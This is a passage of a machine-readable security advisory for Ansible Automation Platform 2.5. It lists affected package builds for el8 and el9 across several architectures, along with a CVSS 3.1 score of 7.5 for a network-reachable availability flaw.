"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
